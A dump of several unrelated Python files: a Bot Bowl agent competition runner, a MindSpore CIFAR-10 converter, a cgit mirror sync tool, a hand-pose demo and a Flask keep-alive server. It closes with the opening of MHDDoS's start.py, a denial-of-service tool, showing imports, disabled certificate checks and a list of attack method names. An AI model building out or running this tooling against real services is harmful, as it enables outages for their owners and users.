from ffai.ai.competition import PythonSocketClient, PythonSocketServer
from multiprocessing import Process
import time
import secrets
import ffai
import socket
def run_agent(registration_name, port, token):
    """
    Starts a server that hosts an agent.

    :param registration_name: name of a bot registered with ffai (e.g. 'random')
    :param port: TCP port the agent server listens on
    :param token: shared secret the competition client must present
    """
    agent = ffai.make_bot(registration_name)
    server = PythonSocketServer(agent, port, token)
    # Serve requests; the caller runs this in a child process and terminates
    # it when the competition is over.
    server.run()
# Run servers
# Each agent is hosted in its own process, protected by a random token.
token_a = secrets.token_hex(32)
print(f"Token A: {token_a}")
process_a = Process(target=run_agent, args=('random', 5100, token_a))
process_a.start()
token_b = secrets.token_hex(32)
print(f"Token B: {token_b}")
process_b = Process(target=run_agent, args=('random', 5200, token_b))
process_b.start()
# Specify the host running the agents (localhost)
hostname = socket.gethostname()
# Make sure the agents are running
time.sleep(2)
# Load configurations, rules, arena and teams
config = ffai.load_config("bot-bowl-iii")
ruleset = ffai.load_rule_set(config.ruleset)
arena = ffai.load_arena(config.arena)
team_a = ffai.load_team_by_filename("human", ruleset)
team_b = ffai.load_team_by_filename("human", ruleset)
# Make proxy agents
# NOTE(review): hostname was already computed above — redundant reassignment.
hostname = socket.gethostname()
client_a = PythonSocketClient("Player A", hostname, 5100, token=token_a)
client_b = PythonSocketClient("Player B", hostname, 5200, token=token_b)
# Run competition
competition = ffai.Competition(client_a, client_b, team_a, team_b, config=config, ruleset=ruleset, arena=arena, n=2, record=True)
competition.run()
competition.results.print()
# Shut down everything
process_a.terminate()
process_a.join()
process_b.terminate()
process_b.join()
|
cifar10_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar10 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar10 import Cifar10
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar10ToMR']
class Cifar10ToMR:
    """
    A class to transform from cifar10 to MindRecord.

    Args:
        source (str): the cifar10 directory to be transformed.
        destination (str): the MindRecord file path to transform into.

    Raises:
        ValueError: If source or destination is invalid.
    """
    def __init__(self, source, destination):
        check_filename(source)
        self.source = source
        # Verify the source directory really contains the cifar10 binary
        # batches before accepting it.
        files = os.listdir(self.source)
        train_data_flag = False
        test_data_flag = False
        for file in files:
            if file.startswith("data_batch_"):
                train_data_flag = True
            if file.startswith("test_batch"):
                test_data_flag = True
        if not train_data_flag:
            raise PathNotExistsError("data_batch_*")
        if not test_data_flag:
            raise PathNotExistsError("test_batch")
        check_filename(destination)
        self.destination = destination
        self.writer = None
    def run(self, fields=None):
        """
        Executes transformation from cifar10 to MindRecord.

        Args:
            fields (list[str], optional): A list of index fields, e.g.["label"] (default=None).

        Returns:
            MSRStatus, whether cifar10 is successfully transformed to MindRecord.
        """
        if fields and not isinstance(fields, list):
            raise ValueError("The parameter fields should be None or list")
        cifar10_data = Cifar10(self.source, False)
        cifar10_data.load_data()
        images = cifar10_data.images
        logger.info("train images: {}".format(images.shape))
        labels = cifar10_data.labels
        logger.info("train images label: {}".format(labels.shape))
        test_images = cifar10_data.Test.images
        logger.info("test images: {}".format(test_images.shape))
        test_labels = cifar10_data.Test.labels
        logger.info("test images label: {}".format(test_labels.shape))
        # Train split goes to `destination`, test split to `destination_test`.
        data_list = _construct_raw_data(images, labels)
        test_data_list = _construct_raw_data(test_images, test_labels)
        if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
            return FAILED
        if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
            return FAILED
        return SUCCESS
    def transform(self, fields=None):
        """Run :meth:`run` on a helper thread and re-raise any exception it
        hit in the caller's thread; returns the run() result."""
        t = ExceptionThread(target=self.run, kwargs={'fields': fields})
        t.daemon = True
        t.start()
        t.join()
        if t.exitcode != 0:
            raise t.exception
        return t.res
def _construct_raw_data(images, labels):
    """
    Construct raw data from cifar10 data.

    Args:
        images (list): image list from cifar10.
        labels (list): label list from cifar10.

    Returns:
        list[dict], data dictionary constructed from cifar10.

    Raises:
        ModuleNotFoundError: If opencv-python (cv2) is not installed.
    """
    if not cv2:
        raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
    raw_data = []
    for i, img in enumerate(images):
        # Fix: np.int was deprecated and removed in NumPy >= 1.24; the
        # builtin int() performs the same conversion here.
        label = int(labels[i][0])
        # Images are stored RGB; OpenCV expects BGR, hence the channel swap.
        _, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
        row_data = {"id": int(i),
                    "data": img.tobytes(),
                    "label": label}
        raw_data.append(row_data)
    return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
    """
    Generate a MindRecord file from raw data.

    Args:
        file_name (str): File name of MindRecord File.
        raw_data (dict): dict of raw data.
        fields (list[str]): Fields would be set as index which
            could not belong to blob fields and type could not be 'array' or 'bytes'.
        schema_desc (str): String of schema description.

    Returns:
        MSRStatus, whether successfully written into MindRecord.
    """
    # Fixed schema: matches the rows produced by _construct_raw_data().
    schema = {
        "id": {"type": "int64"},
        "label": {"type": "int64"},
        "data": {"type": "bytes"},
    }
    logger.info("transformed MindRecord schema is: {}".format(schema))

    writer = FileWriter(file_name, 1)
    writer.add_schema(schema, schema_desc)
    if isinstance(fields, list) and fields:
        writer.add_index(fields)
    writer.write_raw_data(raw_data)
    return writer.commit()
|
cgitsync.py | #!/usr/bin/env python3
"""Cgit mirror and sync utility.
This is a simple utility that allows easy cloning and updating of a
git repository that is defined in a cgitrepos configuration file.
Multiple cgit sections can be specified that point at specific
provider.
When a repo is added to a section this utility will clone the repo to
the repo.path. On subsequent runs this will just update the repo at
repo.path.
PROVIDERS
---------
github The repo.url must be formatted '{username|org}/repo'.
Clones via ssh protocol (e.g., git@github.com:org/repo.git).
custom Clone from a custom provider. Note that this provider is
specified by passing the '--template' option. Any of the
repo keys can be be specified in the template, e.g.:
'ssh://mygit.com/{mykey}/{owner}/{url}.git'.
See also: https://git.zx2c4.com/cgit/tree/cgitrc.5.txt
"""
__author__ = "Anthony O'Brien"
__copyright__ = "Copyright 2017, Anthony O'Brien"
__license__ = "MIT"
__version__ = "0.1.0-rc.1"
__maintainer__ = "Anthony O'Brien"
__email__ = "anthony@bearonis.com"
import os
import sys
import logging
import argparse
import threading
import subprocess
GIT_TIMEOUT = 900
GIT_BIN = None
TARGET_TEMPLATE = None
log = logging.getLogger('cgitsync')
# ----------------------------------------------------
# Helpers
# ----------------------------------------------------
def which(program):
    """Return the full path to `program` if found on $PATH (or if `program`
    is itself an executable path), otherwise None.

    SRC: http://stackoverflow.com/a/377028/983310
    """
    import os

    def runnable(candidate):
        return os.path.isfile(candidate) and os.access(candidate, os.X_OK)

    head, _ = os.path.split(program)
    if head:
        # An explicit path was supplied: accept it only if it is executable.
        return program if runnable(program) else None

    for directory in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(directory.strip('"'), program)
        if runnable(candidate):
            return candidate
    return None
def process(cmd, env=None):
    """Run `cmd` as a shell subprocess, optionally specifying an environment.

    By default the cmd runs with the inherited environment. stdout and
    stderr are streamed line-by-line into the module logger (INFO and
    ERROR respectively) by two daemon threads. The return code from the
    process is returned.
    """
    def pipe_writer(log_level, pipe):
        """Read lines from `pipe` and log each one at `log_level`.

        `retcode` is read from the enclosing scope: once the process has
        finished (retcode rebound by p.wait) and the pipe is exhausted,
        the loop exits and the pipe is closed.
        """
        while retcode is None:
            for line in iter(pipe.readline, b''):
                log.log(log_level, line.decode())
        pipe.close()
    # Must be bound before the reader threads start: pipe_writer closes over it.
    retcode = None
    p = subprocess.Popen(cmd,
                         env=env,
                         bufsize=0,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         shell=True)  # NOTE(review): shell=True — cmd strings must be trusted
    t_out = threading.Thread(target=pipe_writer, args=(logging.INFO, p.stdout))
    t_err = threading.Thread(target=pipe_writer, args=(logging.ERROR, p.stderr))
    t_out.daemon = True
    t_err.daemon = True
    t_out.start()
    t_err.start()
    # Blocks up to GIT_TIMEOUT seconds; raises subprocess.TimeoutExpired after.
    retcode = p.wait(timeout=GIT_TIMEOUT)
    t_out.join()
    t_err.join()
    return retcode
def setup_logger(verbosity=0, log_file=None):
    """Configure the module logger.

    verbosity 0 keeps WARNING and above, 1 adds INFO, 2 adds DEBUG, and
    3+ switches to the root logger so library logs show too. Output goes
    to `log_file` when given, otherwise to stderr.
    """
    global log
    formatter = logging.Formatter('%(message)s')
    level = 30 - (verbosity * 15)  # WARN+, INFO, DEBUG, DEBUG + libs
    if level <= 0:
        level = 10  # let's be reasonable
    if verbosity > 2:
        log = logging.getLogger()  # all the logs!
    log.setLevel(level)
    if log_file:
        target_path = os.path.abspath(
            os.path.expandvars(
                os.path.expanduser(log_file)))
        handler = logging.FileHandler(target_path)
    else:
        handler = logging.StreamHandler(stream=sys.stderr)
    handler.setLevel(level)
    handler.setFormatter(formatter)
    log.addHandler(handler)
    return
def git(args):
    """Run a git command.

    `args` is the argument string appended to the resolved git binary;
    the subprocess return code is returned.
    """
    cmd = GIT_BIN + ' ' + args
    out = process(cmd)
    return out
# ----------------------------------------------------
# cgitsync
# ----------------------------------------------------
def get_section(cfg, section):
    """Parse a cgitrepos cfg, returning the lines of the named section.

    The returned list starts with the matching ``section=`` line itself
    (stripped) and ends just before the next ``section`` declaration or
    at end of input. An empty list means the section was not found.
    """
    collected = []
    collecting = False
    for raw in cfg.splitlines():
        stripped = raw.strip()
        if stripped.startswith('section'):
            if collecting:
                break  # reached the next section — stop
            name = stripped.split('=', 1)[1].strip()
            collecting = (name == section)
        if collecting:
            collected.append(stripped)
    return collected
def get_repos(section):
    """Build repo definitions from the lines of a cgitrepos section.

    Returns a dict keyed by ``repo.url`` value; each entry maps the
    ``repo.<key>`` names (minus the ``repo.`` prefix) to their values.
    """
    repos = {}
    current = {}

    def flush():
        # Commit the repo being built, but only if it actually has a url.
        if current.get('url'):
            repos[current['url']] = current

    for raw in section:
        entry = raw.strip()
        if entry.startswith('repo.url'):
            flush()
            current = {'url': entry.split('=', 1)[1].strip()}
        elif entry.startswith('repo.'):
            body = entry.split('.', 1)[1]
            key, value = (part.strip() for part in body.strip().split('=', 1))
            current[key] = value
    flush()
    return repos
def set_source_target(template=None, provider='github'):
    """Set the module-level TARGET_TEMPLATE used to build clone URLs.

    A custom `template` takes precedence over `provider`. With no template
    and an unrecognised provider the process exits with status -1.
    """
    global TARGET_TEMPLATE
    if template:
        TARGET_TEMPLATE = template
    elif provider == 'github':
        # Clone over ssh; repo.url is expected to look like '{owner}/{repo}'.
        TARGET_TEMPLATE = 'git@github.com:{url}.git'
    else:
        log.error('No provider or custom format provided.')
        sys.exit(-1)
    return
def get_source_target(repo):
    """Render the clone URL for `repo` by substituting its keys into the
    module-level TARGET_TEMPLATE (set by set_source_target)."""
    return TARGET_TEMPLATE.format(**repo)
def mirror_or_update(repo):
    """Mirror-clone `repo` if repo['path'] does not yet exist, otherwise
    update the existing mirror in place. Returns the git return code."""
    source_repo = get_source_target(repo)
    if os.path.exists(repo['path']):
        log.info('Updating: {} ...'.format(repo['url']))
        retcode = git('-C {} remote update'.format(repo['path']))
    else:
        log.info('Cloning: {} ...'.format(repo['url']))
        log.debug('Source target: {}'.format(source_repo))
        retcode = git('clone --mirror {} {}'.format(source_repo, repo['path']))
    if retcode:
        log.error('Git exited with code: %i\n' % retcode)
    return retcode
def parse_args():
    """Build and parse the command line, then validate git availability.

    GIT_BIN is resolved by main() before this runs; if no git binary was
    found on $PATH the process exits with status -1.
    """
    parser = argparse.ArgumentParser(prog='cgitsync',
                                     description=__doc__,
                                     formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('section', metavar='SECTION', nargs='+',
                        help='Section in cgitrepos to sync, multiple sections may be specified')
    parser.add_argument('-v', action='count', default=0,
                        help='Verbosity, can be repeated (default: WARNING)')
    parser.add_argument('-c', '--config', metavar='CONFIG', default='/etc/cgitrepos',
                        help='Path to cgitrepos configuration (default: /etc/cgitrepos)')
    parser.add_argument('-g', '--git', metavar='GIT',
                        help='Path to git (default: {})'.format(
                            (GIT_BIN if GIT_BIN else 'git on $PATH')))
    parser.add_argument('-l', '--log-file', metavar='LOGFILE',
                        help='Path to logfile (default: stderr)')
    # A custom template and a named provider are mutually exclusive options.
    providers = parser.add_mutually_exclusive_group()
    providers.add_argument('-p', '--provider', metavar='PROVIDER', default='github',
                           choices=['github'],
                           help='Sync from selected provider (default: github)')
    providers.add_argument('-t', '--template', metavar='TEMPLATE',
                           help='Custom provider format string (e.g., '
                                'https://mygit.com/{url}/{owner}). Any of the '
                                'repo keys in cgitrepos is valid.')
    parser.add_argument('--version', action='version',
                        version=('%(prog)s ' + __version__),
                        help='Print version information')
    args = parser.parse_args()
    if GIT_BIN is None:
        log.error('No git binary found on $PATH')
        sys.exit(-1)
    return args
def main():
    """Entry point: resolve git, parse options, sync each requested section.

    Exits with the number of repos that failed to clone or update
    (0 on full success).
    """
    global GIT_BIN
    GIT_BIN = which('git')
    error_count = 0
    args = parse_args()
    setup_logger(verbosity=args.v, log_file=args.log_file)
    # BUG FIX: the -g/--git option was parsed but never applied, so a
    # user-supplied git path was silently ignored. Honour it here.
    if args.git:
        GIT_BIN = args.git
    set_source_target(template=args.template, provider=args.provider)
    with open(args.config, 'r') as f:
        cfg = f.read()
    for section_name in args.section:
        section = get_section(cfg, section_name)
        if not section:
            log.warning('section={} not found in {}'.format(section_name, args.config))
            continue
        log.info('Processing repos in section={}'.format(section_name))
        for repo in get_repos(section).values():
            try:
                retcode = mirror_or_update(repo)
                error_count += (1 if retcode else 0)
            except Exception as e:
                # Keep going: one broken repo must not abort the whole sync.
                error_count += 1
                log.error('Error cloning/updating: {}'.format(repo['url']))
                log.exception(e)
    sys.exit(error_count)
if __name__ == '__main__':
main()
|
handpose_local_app.py | #-*-coding:utf-8-*-
'''
DpCas-Light
|||| ||||| |||| || |||||||
|| || || || || || |||| || ||
|| || || || || || || || ||
|| || || || || ||====|| ||||||
|| || ||||| || || ||======|| ||
|| || || || || || || || ||
|||| || |||| || || |||||||
/--------------------- HandPose_X ---------------------/
'''
# date:2021-03-12
# Author: Eric.Lee
# function: handpose demo
import os
import cv2
import time
from multiprocessing import Process
from multiprocessing import Manager
import cv2
import numpy as np
import random
import time
# 加载模型组件库
from hand_detect.yolo_v3_hand import yolo_v3_hand_model
from hand_keypoints.handpose_x import handpose_x_model
from classify_imagenet.imagenet_c import classify_imagenet_model
# 加载工具库
import sys
sys.path.append("./lib/hand_lib/")
from cores.handpose_fuction import handpose_track_keypoints21_pipeline
from cores.handpose_fuction import hand_tracking,audio_recognize,judge_click_stabel,draw_click_lines
from utils.utils import parse_data_cfg
# from playsound import playsound
'''
def audio_process_dw_edge_cnt(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
# time.sleep(1)
# playsound("./materials/audio/sentences/WelcomeAR.mp3")
# time.sleep(0.01)
# playsound("./materials/audio/sentences/MorningEric.mp3")
# time.sleep(1)
reg_cnt = 0
while True:
time.sleep(0.01)
try:
reg_cnt = info_dict["click_dw_cnt"]
for i in range(reg_cnt):
# playsound("./materials/audio/cue/winwin-1.mp3")
playsound("./materials/audio/sentences/welldone.mp3")
info_dict["click_dw_cnt"] = info_dict["click_dw_cnt"] - reg_cnt
except Exception as inst:
print(type(inst),inst) # exception instance
if info_dict["break"] == True:
break
def audio_process_up_edge_cnt(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
reg_cnt = 0
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
reg_cnt = info_dict["click_up_cnt"]
for i in range(reg_cnt):
# playsound("./materials/audio/cue/m2-0.mp3")
playsound("./materials/audio/sentences/Click.mp3")
info_dict["click_up_cnt"] = info_dict["click_up_cnt"] - reg_cnt
except Exception as inst:
print(type(inst),inst) # the exception instance
if info_dict["break"] == True:
break
def audio_process_dw_edge(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
for g_ in gesture_names:
if gesture_dict[g_] is None:
gesture_dict[g_] = info_dict[g_]
else:
if ("click"==g_):
if (info_dict[g_]^gesture_dict[g_]) and info_dict[g_]==False:# 判断Click手势信号为下降沿,Click动作结束
playsound("./materials/audio/cue/winwin.mp3")
# playsound("./materials/audio/sentences/welldone.mp3")
gesture_dict[g_] = info_dict[g_]
except Exception as inst:
print(type(inst),inst) # the exception instance
if info_dict["break"] == True:
break
def audio_process_up_edge(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
for g_ in gesture_names:
if gesture_dict[g_] is None:
gesture_dict[g_] = info_dict[g_]
else:
if ("click"==g_):
if (info_dict[g_]^gesture_dict[g_]) and info_dict[g_]==True:# 判断Click手势信号为上升沿,Click动作开始
playsound("./materials/audio/cue/m2.mp3")
# playsound("./materials/audio/sentences/clik_quick.mp3")
gesture_dict[g_] = info_dict[g_]
except Exception as inst:
print(type(inst),inst) # the exception instance
if info_dict["break"] == True:
break
'''
# 启动识别语音进程
'''
def audio_process_recognize_up_edge(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["double_en_pts"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
for g_ in gesture_names:
if gesture_dict[g_] is None:
gesture_dict[g_] = info_dict[g_]
else:
if ("double_en_pts"==g_):
if (info_dict[g_]^gesture_dict[g_]) and info_dict[g_]==True:# 判断Click手势信号为上升沿,Click动作开始
playsound("./materials/audio/sentences/IdentifyingObjectsWait.mp3")
playsound("./materials/audio/sentences/ObjectMayBeIdentified.mp3")
if info_dict["reco_msg"] is not None:
print("process - (audio_process_recognize_up_edge) reco_msg : {} ".format(info_dict["reco_msg"]))
doc_name = info_dict["reco_msg"]["label_msg"]["doc_name"]
reco_audio_file = "./materials/audio/imagenet_2012/{}.mp3".format(doc_name)
if os.access(reco_audio_file,os.F_OK):# 判断语音文件是否存在
playsound(reco_audio_file)
info_dict["reco_msg"] = None
gesture_dict[g_] = info_dict[g_]
except Exception as inst:
print(type(inst),inst) # exception instance
if info_dict["break"] == True:
break
'''
'''
/*****************************************/
算法 pipeline
/*****************************************/
'''
def handpose_x_process(info_dict,config):
    """Main handpose pipeline: detect hands, track their 21 keypoints,
    maintain per-hand click trajectories and trigger object recognition.

    Runs until ESC is pressed in the preview window or the camera stops
    delivering frames.

    Args:
        info_dict: multiprocessing Manager dict shared with sibling
            processes (keys used here: handpose_procss_ready, break,
            click_up_cnt, click_dw_cnt, reco_msg, double_en_pts).
        config: dict parsed from the .cfg file — model paths/thresholds,
            camera id, visualisation flags.
    """
    # Model initialisation
    print("load model component ...")
    # yolo v3 hand-detection model initialisation
    hand_detect_model = yolo_v3_hand_model(conf_thres=float(config["detect_conf_thres"]),nms_thres=float(config["detect_nms_thres"]),
        model_arch = config["detect_model_arch"],model_path = config["detect_model_path"],yolo_anchor_scale = float(config["yolo_anchor_scale"]),
        img_size = float(config["detect_input_size"]),
        )
    # handpose_x 21-keypoint regression model initialisation
    handpose_model = handpose_x_model(model_arch = config["handpose_x_model_arch"],model_path = config["handpose_x_model_path"])
    #
    gesture_model = None # currently unused / defaults to None
    #
    object_recognize_model = classify_imagenet_model(model_arch = config["classify_model_arch"],model_path = config["classify_model_path"],
        num_classes = int(config["classify_model_classify_num"])) # object-recognition classification model
    #
    img_reco_crop = None
    cap = cv2.VideoCapture(int(config["camera_id"])) # open the camera
    cap.set(cv2.CAP_PROP_EXPOSURE, -8) # set camera exposure (NOTE: not effective on all cameras)
    # url="http://admin:admin@192.168.43.1:8081"
    # cap=cv2.VideoCapture(url)
    print("start handpose process ~")
    info_dict["handpose_procss_ready"] = True # start-up sync signal for the sibling processes
    gesture_lines_dict = {} # per-hand trajectory points while click is enabled
    hands_dict = {} # per-hand tracking info
    hands_click_dict = {} # per-hand click counters
    track_index = 0 # global tracking index
    while True:
        ret, img = cap.read()# read a camera frame
        if ret:# frame read successfully
            # img = cv2.flip(img,-1)
            algo_img = img.copy()
            st_ = time.time()
            #------
            hand_bbox =hand_detect_model.predict(img,vis = True) # detect hands, get their bounding boxes
            hands_dict,track_index = hand_tracking(data = hand_bbox,hands_dict = hands_dict,track_index = track_index) # hand tracking, currently IOU-based
            # detect each hand's keypoints and related info
            handpose_list = handpose_track_keypoints21_pipeline(img,hands_dict = hands_dict,hands_click_dict = hands_click_dict,track_index = track_index,algo_img = algo_img,
                handpose_model = handpose_model,gesture_model = gesture_model,
                icon = None,vis = True)
            et_ = time.time()
            # NOTE(review): fps_ is computed but never displayed or used.
            fps_ = 1./(et_-st_+1e-8)
            #------------------------------------------ maintain tracked-hand state
            #------------------ collect the IDs of currently tracked hands
            id_list = []
            for i in range(len(handpose_list)):
                _,_,_,dict_ = handpose_list[i]
                id_list.append(dict_["id"])
            # print(id_list)
            #----------------- collect hand IDs that need removal
            id_del_list = []
            for k_ in gesture_lines_dict.keys():
                if k_ not in id_list:# drop trajectories of hands whose tracking has been lost
                    id_del_list.append(k_)
            #----------------- delete state of hands that can no longer be tracked
            for k_ in id_del_list:
                del gesture_lines_dict[k_]
                del hands_click_dict[k_]
            #----------------- update trajectories and the rising/falling edges of the click signal
            double_en_pts = []
            for i in range(len(handpose_list)):
                _,_,_,dict_ = handpose_list[i]
                id_ = dict_["id"]
                if dict_["click"]:
                    if id_ not in gesture_lines_dict.keys():
                        gesture_lines_dict[id_] = {}
                        gesture_lines_dict[id_]["pts"]=[]
                        gesture_lines_dict[id_]["line_color"] = (random.randint(100,255),random.randint(100,255),random.randint(100,255))
                        gesture_lines_dict[id_]["click"] = None
                    # rising-edge check
                    if gesture_lines_dict[id_]["click"] is not None:
                        if gesture_lines_dict[id_]["click"] == False:# rising-edge counter
                            info_dict["click_up_cnt"] += 1
                    # record the click state
                    gesture_lines_dict[id_]["click"] = True
                    #--- record the coordinate
                    gesture_lines_dict[id_]["pts"].append(dict_["choose_pt"])
                    double_en_pts.append(dict_["choose_pt"])
                else:
                    if id_ not in gesture_lines_dict.keys():
                        gesture_lines_dict[id_] = {}
                        gesture_lines_dict[id_]["pts"]=[]
                        gesture_lines_dict[id_]["line_color"] = (random.randint(100,255),random.randint(100,255),random.randint(100,255))
                        gesture_lines_dict[id_]["click"] = None
                    elif id_ in gesture_lines_dict.keys():
                        gesture_lines_dict[id_]["pts"]=[]# clear the trajectory
                        # falling-edge check
                        if gesture_lines_dict[id_]["click"] == True:# falling-edge counter
                            info_dict["click_dw_cnt"] += 1
                        # update the click state
                        gesture_lines_dict[id_]["click"] = False
            # draw the thumb/index-finger centre-point trajectory while a hand is in click state
            draw_click_lines(img,gesture_lines_dict,vis = bool(config["vis_gesture_lines"]))
            # check whether each hand's click state is stable and exceeds the configured threshold
            flag_click_stable = judge_click_stabel(img,handpose_list,int(config["charge_cycle_step"]))
            # decide whether to start recognition speech and recognise the selected object
            img_reco_crop,reco_msg = audio_recognize(img,algo_img,img_reco_crop,object_recognize_model,info_dict,double_en_pts,flag_click_stable)
            # print(reco_msg)
            # Draw the hand count twice: thick blue stroke under a thin red fill.
            cv2.putText(img, 'HandNum:[{}]'.format(len(hand_bbox)), (5,25),cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 0, 0),5)
            cv2.putText(img, 'HandNum:[{}]'.format(len(hand_bbox)), (5,25),cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 0, 255))
            cv2.namedWindow("image",0)
            cv2.imshow("image",img)
            if cv2.waitKey(1) == 27:
                # ESC pressed: tell the sibling processes to shut down too.
                info_dict["break"] = True
                break
        else:
            break
    cap.release()
    cv2.destroyAllWindows()
def main_handpose_x(cfg_file):
    """Load the config, build the shared inter-process state dict, and
    launch the handpose pipeline process(es), blocking until they exit.

    Args:
        cfg_file: path to the .cfg file consumed by parse_data_cfg().
    """
    config = parse_data_cfg(cfg_file)
    print("\n/---------------------- main_handpose_x config ------------------------/\n")
    for k_ in config.keys():
        print("{} : {}".format(k_,config[k_]))
    print("\n/------------------------------------------------------------------------/\n")
    print(" loading handpose_x local demo ...")
    g_info_dict = Manager().dict()# shared multiprocess dict: key/value state exchanged between processes
    g_info_dict["handpose_procss_ready"] = False # inter-process start-up sync signal
    g_info_dict["break"] = False # inter-process shutdown sync signal
    g_info_dict["double_en_pts"] = False # two-hand "select" gesture enable signal
    g_info_dict["click_up_cnt"] = 0
    g_info_dict["click_dw_cnt"] = 0
    g_info_dict["reco_msg"] = None
    print(" multiprocessing dict key:\n")
    for key_ in g_info_dict.keys():
        print( " -> ",key_)
    print()
    #-------------------------------------------------- initialise worker processes
    process_list = []
    t = Process(target=handpose_x_process,args=(g_info_dict,config,))
    process_list.append(t)
    # The audio feedback processes below are currently disabled:
    # t = Process(target=audio_process_recognize_up_edge,args=(g_info_dict,)) # play on rising edge
    # process_list.append(t)
    # t = Process(target=audio_process_dw_edge_cnt,args=(g_info_dict,)) # play on falling edge
    # process_list.append(t)
    # t = Process(target=audio_process_up_edge_cnt,args=(g_info_dict,)) # play on rising edge
    # process_list.append(t)
    for i in range(len(process_list)):
        process_list[i].start()
    for i in range(len(process_list)):
        process_list[i].join()# main process waits for the children to finish
    del process_list
|
keepalive.py | from flask import Flask
from threading import Thread
from gevent.pywsgi import WSGIServer
import os
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
    """Health-check endpoint: reports that the instance is up."""
    return "I'm alive"
def run():
    """
    Serves the purpose of keeping the repl instance alive through a webhook.
    Setting up the webhook pinger part is up to the host.

    Binds on all interfaces at $WEBHOOK_PORT (default 8080) and blocks forever.
    """
    # BUG FIX: os.getenv returns a *string* when the variable is set, but the
    # WSGIServer listener expects an int port — coerce explicitly.
    port = int(os.getenv('WEBHOOK_PORT', 8080))
    http_server = WSGIServer(('', port), app)
    http_server.serve_forever()
def keep_alive():
    """Start the keep-alive web server in a background daemon thread and
    return the started Thread object."""
    server_thread = Thread(target=run, daemon=True)
    server_thread.start()
    return server_thread
|
start.py | #!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from secrets import choice as randchoice
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run, PIPE
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get, cookies
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("DEBUG")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
